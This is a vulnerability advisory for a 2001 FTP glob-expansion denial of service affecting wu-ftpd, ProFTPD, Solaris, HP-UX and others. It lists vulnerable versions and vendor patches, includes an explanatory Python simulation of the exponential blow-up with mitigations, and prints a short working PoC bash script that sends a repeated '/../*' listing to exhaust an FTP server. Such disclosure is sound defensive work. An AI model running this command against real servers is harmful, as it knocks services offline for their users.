Multiple Vendor FTP glob Expansion Vulnerability
BID:2496
Info
| Bugtraq ID: | 2496 |
| Class: | Input Validation Error |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | Mar 15 2001 12:00AM |
| Updated: | Mar 15 2001 12:00AM |
| Credit: | This vulnerability was announced to the Bugtraq mailing list by Frank DENIS (Jedi/Sector One) <[email protected]> on March 15, 2001. |
Vulnerable:
Washington University wu-ftpd 2.6.0
Washington University wu-ftpd 2.5.0
Washington University wu-ftpd 2.4.2 academ[BETA1-15]
Washington University wu-ftpd 2.4.2 academ[BETA-18]
Trolltech ftpd 1.25
Trolltech ftpd 1.24
Trolltech ftpd 1.23
Trolltech ftpd 1.22
Trolltech ftpd 1.21
Sun Solaris 8_x86
Sun Solaris 8_sparc
Sun Solaris 7.0_x86
Sun Solaris 7.0
S.u.S.E. Linux 7.2
PureFTPd PureFTPd 0.96
ProFTPD Project ProFTPD 1.2.1
ProFTPD Project ProFTPD 1.2 pre9
ProFTPD Project ProFTPD 1.2 pre8
ProFTPD Project ProFTPD 1.2 pre7
ProFTPD Project ProFTPD 1.2 pre6
ProFTPD Project ProFTPD 1.2 pre5
ProFTPD Project ProFTPD 1.2 pre4
ProFTPD Project ProFTPD 1.2 pre3
ProFTPD Project ProFTPD 1.2 pre2
ProFTPD Project ProFTPD 1.2 pre11
ProFTPD Project ProFTPD 1.2 pre10
ProFTPD Project ProFTPD 1.2 pre1
ProFTPD Project ProFTPD 1.2.0rc3
ProFTPD Project ProFTPD 1.2
OpenBSD OpenBSD 2.7
OpenBSD OpenBSD 2.6
Mandriva Linux Mandrake 8.0
IBM AIX 4.3
HP HP-UX 11.11
HP HP-UX 11.0
HP HP-UX 10.20
HP HP-UX 10.10
HP HP-UX 10.01
FreeBSD FreeBSD 4.2
FreeBSD FreeBSD 3.5.1
Debian Linux 2.2 sparc
Debian Linux 2.2 powerpc
Debian Linux 2.2 arm
Debian Linux 2.2 alpha
Debian Linux 2.2 68k
Debian Linux 2.2
BeroFTPD BeroFTPD 1.3.4
Apple Mac OS X 10.0.1
Apple Mac OS X 10.0

Not Vulnerable:
Washington University wu-ftpd 2.6.1
Apple Mac OS X 10.0.2
Discussion
Many FTP servers are vulnerable to a denial of service condition resulting from poor globbing algorithms combined with missing per-user resource usage limits.
Globbing generates pathnames from file name patterns of the kind used by the shell, e.g. wildcards denoted by * and ?, multiple choices denoted by {}, etc. Because every wildcard segment multiplies the number of candidate pathnames, a pattern that alternates ".." and "*" many times forces the server to generate and hold a number of pathnames that grows exponentially with the length of the pattern.
The vulnerable FTP servers can be exploited to exhaust system resources if per-user resource usage controls have not been implemented.
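To make the resource behaviour concrete, the following is an added example and not code from the advisory or from any of the affected servers: a toy glob expander over a constructed in-memory directory tree. It shows why a pattern built from repeated `/../*` segments, the shape used in the PoC, produces N**k candidates for N entries per directory, and demonstrates two server-side controls: a per-request work budget that aborts the expansion, and deduplication of candidates after each segment. The tree, the budget value and the function names are all assumptions of this example.

```python
import fnmatch
import posixpath

# Constructed in-memory directory tree (dir -> entries), not a real server's tree.
# Every directory holds four entries so the growth per "*" is easy to follow.
FS = {
    "/":    ["bin", "etc", "pub", "usr"],
    "/bin": ["ls", "sh", "cat", "ftpd"],
    "/etc": ["passwd", "hosts", "motd", "ftpusers"],
    "/pub": ["a.txt", "b.txt", "c.txt", "d.txt"],
    "/usr": ["lib", "bin", "share", "local"],
}

class GlobLimitExceeded(Exception):
    """Expansion stopped because it exceeded the per-request work budget."""

def expand(pattern, max_candidates=None, dedupe=False):
    """Expand an absolute glob pattern against FS one path segment at a time.

    Returns (matches, examined): the matched paths and how many directory
    entries were tested. Mirrors a naive server-side glob: every ".." keeps
    one candidate per path that reached it, so "/../*" repeated k times
    yields N**k matches for N entries per directory. max_candidates aborts
    once that many entries have been examined; dedupe collapses identical
    candidates after each segment, which removes the blow-up entirely.
    """
    current = ["/"]
    examined = 0
    for seg in (s for s in pattern.split("/") if s):
        nxt = []
        for base in current:
            if seg == "..":
                nxt.append(posixpath.normpath(posixpath.join(base, "..")))
                continue
            for name in FS.get(base, []):  # a plain file has no entries
                examined += 1
                if max_candidates is not None and examined > max_candidates:
                    raise GlobLimitExceeded(
                        f"more than {max_candidates} entries examined")
                if fnmatch.fnmatchcase(name, seg):
                    nxt.append(posixpath.join(base, name))
        current = list(dict.fromkeys(nxt)) if dedupe else nxt
    return current, examined

def candidate_count(pattern, **kw):
    """Return (number of matches, entries examined) for a pattern."""
    matches, examined = expand(pattern, **kw)
    return len(matches), examined

if __name__ == "__main__":
    bad = "/../*" * 6  # same shape as the PoC pattern, shortened
    print("unbounded:", candidate_count(bad))                 # (4096, 5460)
    print("deduplicated:", candidate_count(bad, dedupe=True))  # (4, 24)
    try:
        candidate_count(bad, max_candidates=1000)
    except GlobLimitExceeded as e:
        print("budgeted:", e)
```

With six repetitions and four entries per directory the naive expansion already touches 5460 entries to produce 4096 duplicate paths; the real PoC uses more repetitions against real directories, which is where the exhaustion comes from.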
Exploit / POC
Contributed by Enrico Kern <[email protected]>:

```bash
#!/bin/bash
ftp -n FTP-SERVER<<\end
quot user anonymous
bin
quot pass [email protected]
ls /../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*
bye
end
```
Solution / Fix
Solution:
This issue was remedied in ProFTPD versions later than 1.2.1.
Upgrades are available.
ProFTPD Project ProFTPD 1.2.0rc3
ProFTPD Project ProFTPD 1.2 pre4
ProFTPD Project ProFTPD 1.2 pre5
ProFTPD Project ProFTPD 1.2 pre8
ProFTPD Project ProFTPD 1.2 pre11
ProFTPD Project ProFTPD 1.2 pre6
ProFTPD Project ProFTPD 1.2 pre1
ProFTPD Project ProFTPD 1.2 pre9
ProFTPD Project ProFTPD 1.2 pre7
ProFTPD Project ProFTPD 1.2 pre3
ProFTPD Project ProFTPD 1.2 pre2
ProFTPD Project ProFTPD 1.2
ProFTPD Project ProFTPD 1.2 pre10
ProFTPD Project ProFTPD 1.2.1
HP HP-UX 10.01
HP HP-UX 10.10
HP HP-UX 10.20
HP HP-UX 11.0
HP HP-UX 11.11
ProFTPD Project ProFTPD 1.2.0rc3
- Conectiva proftpd-1.2.5rc1-1U50_1cl.i386.rpm
  ftp://atualizacoes.conectiva.com.br/5.0/i386/proftpd-1.2.5rc1-1U50_1cl.i386.rpm
- Conectiva proftpd-1.2.5rc1-1U50_1cl.i386.rpm
  ftp://atualizacoes.conectiva.com.br/ferramentas/ecommerce/i386/proftpd-1.2.5rc1-1U50_1cl.i386.rpm
- Conectiva proftpd-1.2.5rc1-1U50_1cl.i386.rpm
  ftp://atualizacoes.conectiva.com.br/ferramentas/graficas/i386/proftpd-1.2.5rc1-1U50_1cl.i386.rpm
- Conectiva proftpd-1.2.5rc1-1U51_1cl.i386.rpm
  ftp://atualizacoes.conectiva.com.br/5.1/i386/proftpd-1.2.5rc1-1U51_1cl.i386.rpm
- Conectiva proftpd-1.2.5rc1-1U60_1cl.i386.rpm
  ftp://atualizacoes.conectiva.com.br/6.0/RPMS/proftpd-1.2.5rc1-1U60_1cl.i386.rpm
- Conectiva proftpd-1.2.5rc1-1U70_1cl.i386.rpm
  ftp://atualizacoes.conectiva.com.br/7.0/RPMS/proftpd-1.2.5rc1-1U70_1cl.i386.rpm
- Conectiva proftpd-doc-1.2.5rc1-1U50_1cl.i386.rpm
- Conectiva proftpd-doc-1.2.5rc1-1U50_1cl.i386.rpm
  ftp://atualizacoes.conectiva.com.br/5.0/i386/proftpd-doc-1.2.5rc1-1U50_1cl.i386.rpm
- Conectiva proftpd-doc-1.2.5rc1-1U50_1cl.i386.rpm
  ftp://atualizacoes.conectiva.com.br/ferramentas/graficas/i386/proftpd-doc-1.2.5rc1-1U50_1cl.i386.rpm
- Conectiva proftpd-doc-1.2.5rc1-1U51_1cl.i386.rpm
  ftp://atualizacoes.conectiva.com.br/5.1/i386/proftpd-doc-1.2.5rc1-1U51_1cl.i386.rpm
- Conectiva proftpd-doc-1.2.5rc1-1U60_1cl.i386.rpm
  ftp://atualizacoes.conectiva.com.br/6.0/RPMS/proftpd-doc-1.2.5rc1-1U60_1cl.i386.rpm
- Conectiva proftpd-doc-1.2.5rc1-1U70_1cl.i386.rpm
  ftp://atualizacoes.conectiva.com.br/7.0/RPMS/proftpd-doc-1.2.5rc1-1U70_1cl.i386.rpm
- Mandrake proftpd-1.2.5-0.rc1.1.2mdk.i586.rpm (Mandrake Linux 7.2 i586 upgrade)
  http://www.linux-mandrake.com/en/ftp.php3
- Mandrake proftpd-1.2.5-0.rc1.1mdk.i586.rpm (Mandrake Linux 8.0 i586 upgrade)
  http://www.linux-mandrake.com/en/ftp.php3
- Mandrake proftpd-1.2.5-0.rc1.1mdk.i586.rpm (Mandrake Linux 8.1 i586 upgrade)
  http://www.linux-mandrake.com/en/ftp.php3
- Mandrake proftpd-1.2.5-0.rc1.1mdk.ppc.rpm (Mandrake Linux 8.0 PPC upgrade)
  http://www.linux-mandrake.com/en/ftp.php3
- Mandrake proftpd-1.2.5-0.rc1.2mdk.ia64.rpm (Mandrake Linux 8.1 IA64 upgrade)
  http://www.linux-mandrake.com/en/ftp.php3
- ProFTPD Project proftpd-1.2.4.tar.gz
  ftp://ftp.proftpd.org/distrib/source/proftpd-1.2.4.tar.gz

ProFTPD Project ProFTPD 1.2 pre4
- ProFTPD Project proftpd-1.2.4.tar.gz
  ftp://ftp.proftpd.org/distrib/source/proftpd-1.2.4.tar.gz

ProFTPD Project ProFTPD 1.2 pre5
- ProFTPD Project proftpd-1.2.4.tar.gz
  ftp://ftp.proftpd.org/distrib/source/proftpd-1.2.4.tar.gz

ProFTPD Project ProFTPD 1.2 pre8
- ProFTPD Project proftpd-1.2.4.tar.gz
  ftp://ftp.proftpd.org/distrib/source/proftpd-1.2.4.tar.gz

ProFTPD Project ProFTPD 1.2 pre11
- ProFTPD Project proftpd-1.2.4.tar.gz
  ftp://ftp.proftpd.org/distrib/source/proftpd-1.2.4.tar.gz

ProFTPD Project ProFTPD 1.2 pre6
- ProFTPD Project proftpd-1.2.4.tar.gz
  ftp://ftp.proftpd.org/distrib/source/proftpd-1.2.4.tar.gz

ProFTPD Project ProFTPD 1.2 pre1
- ProFTPD Project proftpd-1.2.4.tar.gz
  ftp://ftp.proftpd.org/distrib/source/proftpd-1.2.4.tar.gz

ProFTPD Project ProFTPD 1.2 pre9
- ProFTPD Project proftpd-1.2.4.tar.gz
  ftp://ftp.proftpd.org/distrib/source/proftpd-1.2.4.tar.gz

ProFTPD Project ProFTPD 1.2 pre7
- ProFTPD Project proftpd-1.2.4.tar.gz
  ftp://ftp.proftpd.org/distrib/source/proftpd-1.2.4.tar.gz

ProFTPD Project ProFTPD 1.2 pre3
- ProFTPD Project proftpd-1.2.4.tar.gz
  ftp://ftp.proftpd.org/distrib/source/proftpd-1.2.4.tar.gz

ProFTPD Project ProFTPD 1.2 pre2
- ProFTPD Project proftpd-1.2.4.tar.gz
  ftp://ftp.proftpd.org/distrib/source/proftpd-1.2.4.tar.gz

ProFTPD Project ProFTPD 1.2
- ProFTPD Project proftpd-1.2.4.tar.gz
  ftp://ftp.proftpd.org/distrib/source/proftpd-1.2.4.tar.gz

ProFTPD Project ProFTPD 1.2 pre10
- ProFTPD Project proftpd-1.2.4.tar.gz
  ftp://ftp.proftpd.org/distrib/source/proftpd-1.2.4.tar.gz

ProFTPD Project ProFTPD 1.2.1
- ProFTPD Project proftpd-1.2.4.tar.gz
  ftp://ftp.proftpd.org/distrib/source/proftpd-1.2.4.tar.gz

HP HP-UX 10.01
- HP PHNE_23947
  http://itrc.hp.com

HP HP-UX 10.10
- HP PHNE_23947
  http://itrc.hp.com

HP HP-UX 10.20
- HP PHNE_23948
  http://itrc.hp.com

HP HP-UX 11.0
- HP PHNE_23949
  http://itrc.hp.com

HP HP-UX 11.11
- HP PHNE_23950
  http://itrc.hp.com